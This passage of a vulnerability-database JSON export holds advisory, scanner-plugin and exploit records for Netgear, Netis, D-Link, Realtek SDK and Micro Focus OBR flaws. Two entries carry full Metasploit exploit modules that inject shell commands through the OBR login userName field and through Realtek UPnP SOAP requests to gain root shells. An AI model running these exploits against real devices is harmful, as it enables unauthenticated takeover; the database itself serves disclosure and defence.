vulnerability exists in Netgear ProSAFE. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-28T00:00:00", "type": "checkpoint_advisories", "title": "Netgear ProSAFE Remote Code Execution (CVE-2020-26919)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26919"], "modified": "2021-03-28T00:00:00", "id": "CPAI-2020-3300", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T14:31:52", "description": "# CVE-2019-...", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-13T08:22:36", "type": "githubexploit", "title": "Exploit for OS Command Injection in Netis-Systems Wf2419 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19356"], "modified": "2020-03-13T08:28:35", "id": "9BD1FC77-5827-5107-8C1F-FC0741D1A19D", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-01T04:25:44", "description": "# NETIS router (WF2419) RCE (CVE-2019-19356)\n\n# Context\n\nThe vul...", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T11:01:23", "type": "githubexploit", "title": "Exploit for OS Command Injection in Netis-Systems Wf2419 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19356"], "modified": "2022-06-01T04:16:46", "id": "C3F856DE-1DDF-5DF2-8AD1-EE7532C07200", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "privateArea": 1}], "seebug": [{"lastseen": "2021-07-24T16:14:55", "description": "", "cvss3": {}, "published": "2021-03-10T00:00:00", "type": "seebug", "title": "D-Link DNS-320 \u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2020-25506\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-25506"], "modified": "2021-03-10T00:00:00", "id": "SSV:99154", "href": "https://www.seebug.org/vuldb/ssvid-99154", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-10T19:37:10", "description": "The remote D-Link router is affected by a vulnerability. D-Link DNS-320 FW v2.06B01 Revision Ax is affected by command injection in the system_mgr.cgi component, which can lead to remote arbitrary code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the router's self-reported model.", "cvss3": {}, "published": "2022-11-04T00:00:00", "type": "nessus", "title": "D-Link Routers RCE (CVE-2020-25506)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-25506"], "modified": "2022-11-04T00:00:00", "cpe": [], "id": "D-LINK_ROUTER_CVE-2020-25506.NASL", "href": "https://www.tenable.com/plugins/nessus/166966", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166966);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/04\");\n\n script_name(english:\"D-Link Routers RCE (CVE-2020-25506)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote router is affected by a remote command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote D-Link router is affected by a vulnerability. D-Link DNS-320 FW v2.06B01 Revision Ax is affected by command\ninjection in the system_mgr.cgi component, which can lead to remote arbitrary code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the router's self-reported model.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675\");\n # https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41aae730\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to a supported device.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25506\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 Tenable, Inc.\");\n\n script_dependencies(\"d-link_router_detect.nasl\");\n script_require_keys(\"www/d-link\", \"d-link/model\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('http.inc');\n\nvar model = toupper(get_kb_item_or_exit('d-link/model'));\nif (model !~ \"^DNS-320$\")\n audit(AUDIT_HOST_NOT, 'an affected D-Link model');\n\nif (report_paranoia < 2) audit(AUDIT_POTENTIAL_VULN, 'D-Link model ' + model);\n\nvar port = get_http_port(default:80, embedded:1);\nvar items = make_array('Model', model, 'Solution', 'Upgrade to a supported device');\nvar order = make_list('Model', 'Solution');\nvar report = report_items_str(report_items:items, ordered_fields:order);\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-11T14:53:27", "description": "According to its banner, the Realtek Software Development Kit is running on the remote device. It is, therefore, affected by a flaw in the miniigd SOAP service due to a failure to properly sanitize user input when handling NewInternalClient requests. An unauthenticated, remote attacker, using a crafted request, can exploit this to execute arbitrary code with root level privileges.", "cvss3": {}, "published": "2015-05-01T00:00:00", "type": "nessus", "title": "Realtek SDK miniigd SOAP Service RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:realtek:realtek_sdk"], "id": "REALTEK_CVE_2014_8361.NASL", "href": "https://www.tenable.com/plugins/nessus/83185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83185);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2014-8361\");\n script_bugtraq_id(74330);\n script_xref(name:\"ZDI\", value:\"ZDI-15-155\");\n script_xref(name:\"EDB-ID\", value:\"37169\");\n\n script_name(english:\"Realtek SDK miniigd SOAP Service RCE\");\n script_summary(english:\"Checks the banners.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A software development kit running on the remote device is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the Realtek Software Development Kit is\nrunning on the remote device. It is, therefore, affected by a flaw in\nthe miniigd SOAP service due to a failure to properly sanitize user\ninput when handling NewInternalClient requests. An unauthenticated,\nremote attacker, using a crafted request, can exploit this to execute\narbitrary code with root level privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-15-155/\");\n script_set_attribute(attribute:\"solution\", value:\n\"There is currently no fix available. As a workaround, restrict access\nto vulnerable devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Realtek SDK Miniigd UPnP SOAP Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/01\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:realtek:realtek_sdk\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"upnp_search.nasl\", \"http_version.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"upnp/server\", \"Services/www\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nglobal_var fix, vuln;\nvuln = FALSE;\n\n##\n# Checks if the given server banner is from a vulnerable\n# version of realtek upnpd. If so, a reporting function is\n# called\n#\n# @param port port number of the service being tested\n# @param server server banner advertised on \"port\"\n# @param proto the protocol the port is accessible by (tcp or udp)\n##\nfunction _check_realtek_version(port, server, proto)\n{\n local_var ver, report, banner;\n server = chomp(server);\n ver = eregmatch(string:server, pattern:\"realtek/v((0(\\.[0-9.]+)?|1\\.[0-3](\\.[0-9.]+)?|1)$)\", icase:TRUE);\n\n if (!isnull(ver))\n {\n vuln = TRUE;\n\n banner = ereg_replace(string:server, pattern:'SERVER: *(.+)', replace:\"\\1\", icase:TRUE);\n report =\n '\\n Server banner : ' + banner +\n '\\n Installed version : ' + ver[1] + '\\n';\n\n security_report_v4(port:port,\n proto:proto,\n severity:SECURITY_HOLE,\n extra:report);\n }\n}\n\n# check the server string retrieved via UDP 1900 by upnp_search.nasl\nservers = get_kb_list('upnp/server');\nforeach(server in servers) _check_realtek_version(port:1900, server:server, proto:'udp');\n\n# check any server strings retrieved via HTTP\nwww_ports = get_kb_list('Services/www');\n\nif(!vuln && isnull(www_ports))\n audit(AUDIT_HOST_NOT, 'affected');\n\nforeach port (www_ports)\n{\n server = http_server_header(port:port);\n if (empty_or_null(server)) continue;\n\n _check_realtek_version(port:port, server:server, proto:'tcp');\n}\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-19T03:20:07", "description": "This Metasploit module exploits a command injection vulnerability on login that affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below. It is a straight up command injection, with little escaping required, and it works before authentication. This module has been tested on the Linux 10.40 version.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-30T00:00:00", "type": "zdt", "title": "Micro Focus Operations Bridge Reporter Unauthenticated Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-30T00:00:00", "id": "1337DAY-ID-36171", "href": "https://0day.today/exploit/description/36171", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Micro Focus Operations Bridge Reporter Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits a command injection vulnerability on *login* (yes, you read that right)\n that affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below.\n It's a straight up command injection, with little escaping required and it works before\n authentication.\n This module has been tested on the Linux 10.40 version. Older versions might be affected,\n check the advisory for details.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2021-22502'],\n ['ZDI', '21-153'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'],\n ['URL', 'https://softwaresupport.softwaregrp.com/doc/KM03775947']\n ],\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024, # This should be a safe value, it might take much more\n 'DisableNops' => true,\n # avoid null char and the injection char (`)\n 'BadChars' => \"\\x00\\x60\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n # all of these (and more) should exist in a standard RHEL / SuSE\n # ... which are the only two distros supported by Micro Focus OBR\n # (telnet doesn't seem to work though)\n #\n # all reverse shells were tested and work flawlessly\n 'RequiredCmd' => 'netcat openssl generic python'\n }\n },\n 'Targets' =>\n [\n [ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-02-09'\n )\n )\n\n register_options(\n [\n # normal (no SSL) port is 21411\n Opt::RPORT(21412),\n OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),\n OptString.new('TARGETURI', [true, 'Application path', '/'])\n ]\n )\n end\n\n def check\n res = send_request_raw({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),\n 'headers' => { 'Content-Type' => 'application/json' },\n 'data' => rand_text_alpha(10..64)\n }, 10)\n\n if res && res.code == 400 && res.body.include?('Unrecognized token')\n # should return a stack trace like\n # Unrecognized token '#{data}': was expecting ('true', 'false' or 'null')\n # at [Source: org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$UnC (...)\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Unknown\n end\n\n def exploit\n # if there are any 0x22 (\") chars in the encoded payload, escape them with a backslash\n # we have to do this manually, the encoder is not smart enough to do it, and it will\n # fail if we put 0x22 as a bad char above\n payload_enc = payload.encoded.gsub('\"', '\\\\\"')\n\n # we use 0x60 (`) for injection, but there are lots of other possibilities\n data = \"{\\\"userName\\\":\\\"#{rand_text_alpha(1..16)}`#{payload_enc}`\\\",\\\"credential\\\":\\\"#{rand_text_alpha(8..20)}\\\"}\"\n\n send_request_raw({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),\n 'headers' => { 'Content-Type' => 'application/json' },\n 'data' => data\n }, 0)\n\n # it's tricky to check the return value of the request here\n # - it might hang (no return) and give us a shell\n # - it might return 400 or 500 and give us a shell\n # - it might return 400 or 500 and give us nothing\n # so ignore it altogether and hope for the best\n print_status(\"#{peer} - Payload sent, now wait for Shelly, if she doesn't arrive try again!\")\n end\nend\n", "sourceHref": "https://0day.today/exploit/36171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-11T05:23:58", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2015-06-02T00:00:00", "type": "zdt", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-8361"], "modified": "2015-06-02T00:00:00", "id": "1337DAY-ID-23686", "href": "https://0day.today/exploit/description/23686", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include REXML\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',\r\n 'Description' => %q{\r\n Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command\r\n injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,\r\n there is no output for the executed command. This module has been tested successfully on a\r\n Trendnet TEW-731BR router with emulation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery\r\n 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-8361'],\r\n ['ZDI', '15-155'],\r\n ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],\r\n ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']\r\n ],\r\n 'DisclosureDate' => 'Apr 24 2015',\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'MIPS Little Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSLE\r\n }\r\n ],\r\n [ 'MIPS Big Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSBE\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(52869) # port of UPnP SOAP webinterface\r\n ], self.class)\r\n end\r\n \r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/picsdesc.xml'\r\n })\r\n if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/\r\n return Exploit::CheckCode::Detected\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n Exploit::CheckCode::Unknown\r\n end\r\n \r\n def exploit\r\n print_status(\"#{peer} - Trying to access the device ...\")\r\n \r\n unless check == Exploit::CheckCode::Detected\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\r\n end\r\n \r\n print_status(\"#{peer} - Exploiting...\")\r\n \r\n execute_cmdstager(\r\n :flavour => :echo,\r\n :linemax => 50,\r\n :nodelete => true\r\n )\r\n end\r\n \r\n def execute_command(cmd, opts)\r\n uri = '/wanipcn.xml'\r\n soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'\r\n data_cmd = '<?xml version=\"1.0\"?>' + build_soap_req\r\n \r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'vars_get' => {\r\n 'service' => 'WANIPConn1'\r\n },\r\n 'ctype' => 'text/xml',\r\n 'method' => 'POST',\r\n 'headers' => {\r\n 'SOAPAction' => soap_action\r\n },\r\n 'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\")\r\n })\r\n return res\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\n \r\n def build_soap_req\r\n new_external_port = rand(32767) + 32768\r\n new_internal_port = rand(32767) + 32768\r\n \r\n xml = Document.new\r\n \r\n xml.add_element(\r\n 'SOAP-ENV:Envelope',\r\n {\r\n 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',\r\n 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'\r\n })\r\n \r\n xml.root.add_element('SOAP-ENV:Body')\r\n \r\n body = xml.root.elements[1]\r\n \r\n body.add_element(\r\n 'm:AddPortMapping',\r\n {\r\n 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'\r\n })\r\n \r\n port_mapping = body.elements[1]\r\n port_mapping.add_element('NewLeaseDuration')\r\n port_mapping.add_element('NewInternalClient')\r\n port_mapping.add_element('NewEnabled')\r\n port_mapping.add_element('NewExternalPort')\r\n port_mapping.add_element('NewRemoteHost')\r\n port_mapping.add_element('NewProtocol')\r\n port_mapping.add_element('NewInternalPort')\r\n \r\n port_mapping.elements['NewLeaseDuration'].text = ''\r\n port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'\r\n port_mapping.elements['NewEnabled'].text = '1'\r\n port_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\"\r\n port_mapping.elements['NewRemoteHost'].text = ''\r\n port_mapping.elements['NewProtocol'].text = 'TCP'\r\n port_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\"\r\n \r\n xml.to_s\r\n end\r\n \r\nend\n\n# 0day.today [2018-01-11] #", "sourceHref": "https://0day.today/exploit/23686", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2022-01-31T22:28:05", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the userName parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "zdi", "title": "Micro Focus Operations Bridge Reporter userName Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-02-09T00:00:00", "id": "ZDI-21-153", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-153/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:28:04", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the Token parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "zdi", "title": "Micro Focus Operations Bridge Reporter Token Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-06-29T00:00:00", "id": "ZDI-21-154", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-154/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:14:24", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Realtek SDK. Authentication is not required to exploit this vulnerability. The specific flaw exists within the miniigd SOAP service. The issue lies in the handling of the NewInternalClient requests due to a failure to sanitize user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges.", "cvss3": {}, "published": "2015-04-24T00:00:00", "type": "zdi", "title": "(0Day) Realtek SDK miniigd AddPortMapping SOAP Action Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 